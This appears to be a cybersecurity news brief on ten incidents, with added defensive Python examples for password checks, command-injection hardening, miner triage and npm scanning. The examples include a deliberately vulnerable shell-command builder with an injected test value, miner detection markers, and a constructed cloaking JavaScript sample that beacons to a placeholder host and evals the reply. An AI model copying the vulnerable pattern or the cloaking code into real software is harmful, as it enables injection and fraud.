Svoboda Cybersecurity Brief November 19, 2025


Doctor Alliance Suffers Second Hack by Same Threat Actor

The healthcare firm Doctor Alliance was hacked again by the same threat actor, “Kazu,” who exfiltrated 1.27 TB of sensitive patient data, including signed documents and medical records. The attacker got in with admin passwords that had been reused and were already present in infostealer logs.
Impact: Over 5 million files compromised, including protected health information (PHI).
Mitigation: Patch vulnerabilities, enforce unique passwords, and conduct thorough security assessments.
Source: DataBreaches.net
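The root cause in this item is an admin password that was both reused and already sitting in an infostealer dump. The following is an added example (not code from Doctor Alliance or from the source report) of the two checks a password-set handler can run at that moment: a k-anonymity style lookup of the candidate against a compromised-credential corpus, and a reuse check against the other admin accounts' stored hashes. The corpus, the account names and the iteration count are constructed sample values.

```python
from __future__ import annotations

import hashlib
import hmac
import secrets

# Constructed stand-in for a compromised-credential corpus (for instance passwords
# recovered from infostealer logs). A real deployment would query a breach-check
# service or an internal denylist; these two entries are made-up sample values.
COMPROMISED_SHA1 = {
    hashlib.sha1(p.encode("utf-8")).hexdigest().upper()
    for p in ("Winter2024!", "Admin@123")
}

PBKDF2_ITERATIONS = 100_000  # illustration only; raise it (or use Argon2) in production


def sha1_prefix_suffix(password: str) -> tuple[str, str]:
    """Split the SHA-1 into the 5-char prefix and the suffix used by range queries."""
    digest = hashlib.sha1(password.encode("utf-8")).hexdigest().upper()
    return digest[:5], digest[5:]


def is_compromised(password: str, corpus: set[str] = COMPROMISED_SHA1) -> bool:
    """Check a candidate against the corpus the k-anonymity way.

    In a real range query only the 5-char prefix leaves the host; the returned
    suffixes are compared locally, which is what the set comprehension simulates."""
    prefix, suffix = sha1_prefix_suffix(password)
    range_for_prefix = {h[5:] for h in corpus if h.startswith(prefix)}
    return suffix in range_for_prefix


def hash_password(password: str, salt: bytes | None = None) -> str:
    """Salted PBKDF2-HMAC-SHA256, stored as a self-describing string."""
    salt = salt or secrets.token_bytes(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, PBKDF2_ITERATIONS)
    return f"pbkdf2_sha256${PBKDF2_ITERATIONS}${salt.hex()}${dk.hex()}"


def verify_password(password: str, stored: str) -> bool:
    _, iters, salt_hex, dk_hex = stored.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                             bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(dk.hex(), dk_hex)


def check_admin_password(candidate: str, other_admin_hashes: dict[str, str]) -> list[str]:
    """Return the reasons a new admin password must be rejected (empty list = accept).

    Reuse across accounts can only be detected while the plaintext is briefly
    available, i.e. at password-set time, by verifying the candidate against
    every other admin's stored hash."""
    reasons: list[str] = []
    if len(candidate) < 14:
        reasons.append("shorter than 14 characters")
    if is_compromised(candidate):
        reasons.append("appears in compromised-credential corpus")
    shared_with = [user for user, h in other_admin_hashes.items() if verify_password(candidate, h)]
    if shared_with:
        reasons.append("reused by admin account(s): " + ", ".join(shared_with))
    return reasons


if __name__ == "__main__":
    # Hypothetical existing admin account; name and password are constructed.
    existing = {"alice-admin": hash_password("correct horse battery staple 91")}
    for pw in ("Winter2024!", "correct horse battery staple 91", "fuchsia-otter-ledger-44"):
        print(repr(pw), "->", check_admin_password(pw, existing) or "accepted")
```

The reuse check costs one PBKDF2 verification per admin account, which is acceptable for the small number of privileged accounts an organisation should have; it does not scale to the whole user base and is not meant to.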

FortiWeb Zero-Day Exploited in Attacks

Fortinet warned of CVE-2025-58034, an OS command injection flaw in FortiWeb, actively exploited in attacks. The vulnerability allows authenticated attackers to execute arbitrary code via crafted HTTP requests.
Impact: Potential remote code execution on vulnerable systems.
Mitigation: Upgrade to patched versions (e.g., FortiWeb 8.0.2, 7.6.6).
Source: BleepingComputer
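OS command injection of the kind described for FortiWeb arises whenever request data is spliced into a string that a shell parses. As an added example that is not FortiWeb code and says nothing about the actual CVE-2025-58034 code path, here is a hypothetical "diagnostic ping" handler in its vulnerable form beside the hardened form: allowlist validation of the host value, then an argv list passed to the process without any shell in between. The hostname pattern and the metacharacter set are assumptions chosen for the illustration.

```python
import re
import subprocess

# Allowlist for a hostname or IPv4 literal: alphanumerics, dots and dashes, never a
# leading dash (which would otherwise be parsed as an option by the called program).
HOSTNAME_RE = re.compile(r"^[A-Za-z0-9](?:[A-Za-z0-9.-]{0,251}[A-Za-z0-9])?$")
# Characters a POSIX shell gives meaning to; useful for alerting on rejected input.
SHELL_META = set(";|&$`<>()\n\"'\\ ")


def build_ping_command_unsafe(host: str) -> str:
    # VULNERABLE: the request value is interpolated into a string that would be
    # executed with shell=True, so anything after ';' or '|' runs as a command.
    return f"ping -c 1 {host}"


def shell_metachars(value: str) -> set[str]:
    """Return the shell metacharacters present in value (for logging, not sanitising)."""
    return set(value) & SHELL_META


def validate_host(host: str) -> bool:
    """Allowlist validation: reject anything that is not plain hostname/IPv4 syntax."""
    return bool(HOSTNAME_RE.fullmatch(host))


def build_ping_command_safe(host: str) -> list[str]:
    """Validate first, then build an argv list so no shell ever parses the input."""
    if not validate_host(host):
        raise ValueError(f"rejected host value: {host!r}")
    return ["ping", "-c", "1", host]


def run_ping(host: str) -> int:
    # shell=False hands the argv list straight to execve; metacharacters stay literal.
    completed = subprocess.run(build_ping_command_safe(host), shell=False,
                               timeout=10, capture_output=True)
    return completed.returncode


if __name__ == "__main__":
    # Constructed inputs: one legitimate, one with a command separator, one with option injection.
    for h in ("example.com", "example.com; echo injected", "-f example.com"):
        try:
            safe = build_ping_command_safe(h)
        except ValueError as exc:
            safe = str(exc)
        print(repr(h), "| unsafe string:", repr(build_ping_command_unsafe(h)),
              "| metachars:", shell_metachars(h) or "-", "| safe:", safe)
```

Escaping (for example with shlex.quote) is the weaker fix: it keeps the shell in the loop and relies on getting every quoting rule right. Validation plus an argv list removes the shell entirely, which is why it is the preferred pattern for any request-driven command.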

ShadowRay 2.0 Botnet Targets Ray Clusters for Crypto Mining

A threat actor (IronErn440) exploits CVE-2023-48022 in Ray clusters to deploy a self-propagating cryptomining botnet. The malware runs XMRig and evades detection by capping its own CPU usage at 60% and using fake process names.
Impact: Data theft, DDoS attacks, and resource hijacking.
Mitigation: Deploy Ray in trusted environments, restrict API access, and monitor for anomalies.
Source: BleepingComputer
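The two evasion tricks in this item, a self-imposed CPU cap and a fake process name, are both visible from /proc on a Ray node. As an added example that is not from the report and not tooling from the Ray project, the triage below works over constructed process snapshots (the fields mirror /proc/<pid>/comm, /proc/<pid>/exe and /proc/<pid>/cmdline plus a sampled CPU percentage) and scores the indicators a miner masquerading as a kernel thread leaves behind. The marker strings, path prefixes and the CPU band are assumptions for the illustration; the sample data is made up.

```python
from __future__ import annotations

import os
from dataclasses import dataclass


@dataclass
class ProcSnapshot:
    pid: int
    comm: str        # kernel-visible short name; a process can rename itself (prctl PR_SET_NAME)
    exe: str         # readlink of /proc/<pid>/exe; "" for genuine kernel threads
    cmdline: str     # /proc/<pid>/cmdline with NULs replaced by spaces
    cpu_pct: float   # recent CPU usage of this process


# Assumed locations a legitimate daemon should not be running from.
SUSPICIOUS_PATH_PREFIXES = ("/tmp/", "/var/tmp/", "/dev/shm/", "/home/", "/root/")
# Assumed markers typical of a mining client command line.
MINER_MARKERS = ("xmrig", "stratum+tcp://", "stratum+ssl://", "--donate-level",
                 "--max-cpu-usage", "--cpu-max-threads-hint")
# A self-imposed cap near 60% shows up as a flat plateau in this band.
CPU_CAP_BAND = (55.0, 65.0)


def analyze(p: ProcSnapshot) -> list[str]:
    """Return the indicators found for one process; an empty list means nothing suspicious."""
    indicators: list[str] = []
    deleted = p.exe.endswith(" (deleted)")
    exe_base = os.path.basename(p.exe[:-len(" (deleted)")] if deleted else p.exe)
    if deleted:
        indicators.append("executable unlinked after start")
    # comm is the executable basename truncated to 15 chars unless the process renamed itself.
    if p.exe and p.comm and not exe_base.startswith(p.comm[:15]):
        indicators.append(f"name mismatch: comm={p.comm!r} exe={exe_base!r}")
    if p.exe.startswith(SUSPICIOUS_PATH_PREFIXES):
        indicators.append(f"executable in writable/user path: {p.exe}")
    hits = [m for m in MINER_MARKERS if m in p.cmdline.lower()]
    if hits:
        indicators.append("miner markers in cmdline: " + ", ".join(hits))
    # Sustained CPU near a fixed cap is only interesting alongside another indicator;
    # plenty of legitimate workloads sit at 60% on their own.
    if indicators and CPU_CAP_BAND[0] <= p.cpu_pct <= CPU_CAP_BAND[1]:
        indicators.append(f"sustained CPU near a fixed cap ({p.cpu_pct:.0f}%)")
    return indicators


def triage(snapshots: list[ProcSnapshot]) -> dict[int, list[str]]:
    """Map pid -> indicators for processes worth a look: two or more indicators, or a miner marker."""
    flagged: dict[int, list[str]] = {}
    for p in snapshots:
        ind = analyze(p)
        if len(ind) >= 2 or any(i.startswith("miner markers") for i in ind):
            flagged[p.pid] = ind
    return flagged


# Constructed snapshots, not from a real host.
SAMPLE = [
    ProcSnapshot(12, "kworker/0:1", "", "", 0.3),                                  # genuine kernel thread
    ProcSnapshot(2210, "python3", "/usr/bin/python3.11", "python3 -m http.server", 1.2),
    ProcSnapshot(31337, "kworker/u8:2", "/tmp/.cache/xmrig (deleted)",
                 "xmrig -o stratum+tcp://pool.invalid:3333 --max-cpu-usage 60", 59.6),
    ProcSnapshot(4040, "ffmpeg", "/usr/bin/ffmpeg", "ffmpeg -i in.mkv out.mp4", 98.0),  # busy but legitimate
]

if __name__ == "__main__":
    for pid, ind in triage(SAMPLE).items():
        print(pid)
        for line in ind:
            print("   ", line)
```

On a live node the snapshots would come from iterating /proc; the name-mismatch check is the one that survives a renamed process, because prctl changes comm but not the exe symlink.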

Chrome Zero-Day (CVE-2025-13223) Exploited in Wild

Google patched an actively exploited type confusion flaw in Chrome’s V8 engine. The bug allows arbitrary code execution via crafted HTML pages.
Impact: Remote code execution or crashes.
Mitigation: Update to Chrome 142.0.7444.175/.176.
Source: BleepingComputer

French Pajemploi Agency Breach Exposes 1.2M Individuals

Pajemploi, a French childcare payroll service, suffered a breach exposing names, addresses, and social security numbers. No financial data or passwords were compromised.
Source: BleepingComputer

Iranian UNC1549 Hackers Deploy DEEPROOT and TWOSTROKE Malware

The group targeted aerospace and defense sectors using phishing and third-party breaches. Tools include DEEPROOT (Golang backdoor) and TWOSTROKE (C++ backdoor).
Impact: Espionage, credential theft, and lateral movement.
Mitigation: Monitor for suspicious VDI breakouts and enforce MFA.
Source: The Hacker News

Sneaky 2FA Phishing Kit Adds BitB Cloaking

A PhaaS kit now uses Browser-in-the-Browser (BitB) to mimic legitimate login pop-ups and bypass 2FA; it targets Microsoft accounts via fake CAPTCHA pages.
Impact: Credential theft and account takeover.
Mitigation: Train users to verify URLs and enforce conditional access policies.
Source: The Hacker News

npm Packages Use Adspect Cloaking for Crypto Scams

Seven malicious npm packages (e.g., “signals-embed”) used Adspect to redirect victims to crypto scam pages while evading researchers.
Impact: Supply-chain attacks and financial fraud.
Mitigation: Audit npm dependencies and monitor for suspicious IIFE patterns.
Source: The Hacker News
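The mitigation above asks for monitoring of suspicious IIFE patterns in dependencies. As an added example that is not from the report and not from any npm tooling, the scanner below shows what that means in practice: it looks for an immediately invoked function wrapper (so the code runs on import) combined with the primitives a cloaking redirect needs, such as environment probing, decoding of hidden strings, a beacon, and a location change. The two JavaScript samples are constructed (the base64 literal decodes to a placeholder URL on the .invalid TLD), and the regexes, weights and threshold are assumptions for the illustration.

```python
from __future__ import annotations

import re
from dataclasses import dataclass

# An IIFE in either "(function(){...})()" / "(()=>{...})()" or "(function(){...}())" form.
IIFE_OPEN = re.compile(r"\(\s*(?:async\s+)?(?:function\s*\w*\s*\(|\([^()]*\)\s*=>|\w+\s*=>)")
IIFE_CLOSE = re.compile(r"\}\s*\)\s*\(|\}\s*\(\s*\)\s*\)")

# Indicator name -> (pattern, weight). Weights are assumed values.
INDICATORS: dict[str, tuple[re.Pattern[str], int]] = {
    "dynamic code":        (re.compile(r"\beval\s*\(|\bnew\s+Function\s*\(|\bFunction\s*\("), 3),
    "string decoding":     (re.compile(r"\batob\s*\(|String\.fromCharCode|\\x[0-9a-fA-F]{2}|\\u00[0-9a-fA-F]{2}"), 2),
    "redirect":            (re.compile(r"(?:window\.|document\.)?location(?:\.href|\.replace|\.assign)?\s*(?:=|\()|window\.open\s*\("), 2),
    "beaconing":           (re.compile(r"\bfetch\s*\(|XMLHttpRequest|navigator\.sendBeacon"), 1),
    "environment probe":   (re.compile(r"navigator\.(?:userAgent|webdriver|plugins)|screen\.(?:width|height)"), 1),
    "long opaque literal": (re.compile(r"['\"][A-Za-z0-9+/=]{80,}['\"]"), 2),
}


@dataclass
class ScanResult:
    path: str
    in_iife: bool
    indicators: dict[str, int]   # indicator -> number of occurrences
    score: int


def scan_source(path: str, source: str) -> ScanResult:
    in_iife = bool(IIFE_OPEN.search(source)) and bool(IIFE_CLOSE.search(source))
    found = {name: len(rx.findall(source)) for name, (rx, _) in INDICATORS.items()}
    found = {name: n for name, n in found.items() if n}
    score = sum(INDICATORS[name][1] for name in found)
    if in_iife and found:
        score += 2  # the behaviour is wrapped so it fires on import: the pattern of interest
    return ScanResult(path, in_iife, found, score)


def is_suspicious(result: ScanResult, threshold: int = 6) -> bool:
    return result.in_iife and result.score >= threshold


# Constructed samples standing in for files under node_modules/.
SAMPLES = {
    "benign/widget.js": """
(function () {
  'use strict';
  var el = document.getElementById('signals-root');
  if (el) { el.textContent = 'hello'; }
})();
""",
    "suspect/index.js": """
(async () => {
  if (navigator.webdriver || screen.width < 800) return;       // skip automation and small viewports
  const u = atob('aHR0cHM6Ly9leGFtcGxlLmludmFsaWQvY2xvYWs=');   // constructed: a placeholder .invalid URL
  const r = await fetch(u, {method: 'POST', body: navigator.userAgent});
  const t = await r.text();
  window.location.href = eval(t);
})();
""",
}

if __name__ == "__main__":
    for path, src in SAMPLES.items():
        res = scan_source(path, src)
        print(path, "suspicious" if is_suspicious(res) else "ok", res.score, res.indicators)
```

Regex heuristics like these are a triage filter, not a verdict: a flagged file still needs a human read, and a packed or heavily minified file can hide most of the markers. They do catch the cheap case, which is what the cloaked packages in this report relied on.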

Microsoft Mitigates Record 15.72 Tbps DDoS Attack

The AISURU botnet (300k IoT devices) launched a 15.72 Tbps UDP flood against an Australian endpoint.
Impact: Service disruption.
Mitigation: Deploy rate-limiting and DDoS protection services.
Source: The Hacker News

Princeton University Breach via Phishing Attack

A phone phishing attack compromised an employee, exposing alumni and donor data (names, emails, donation records). No SSNs or passwords were leaked.
Source: SecurityWeek
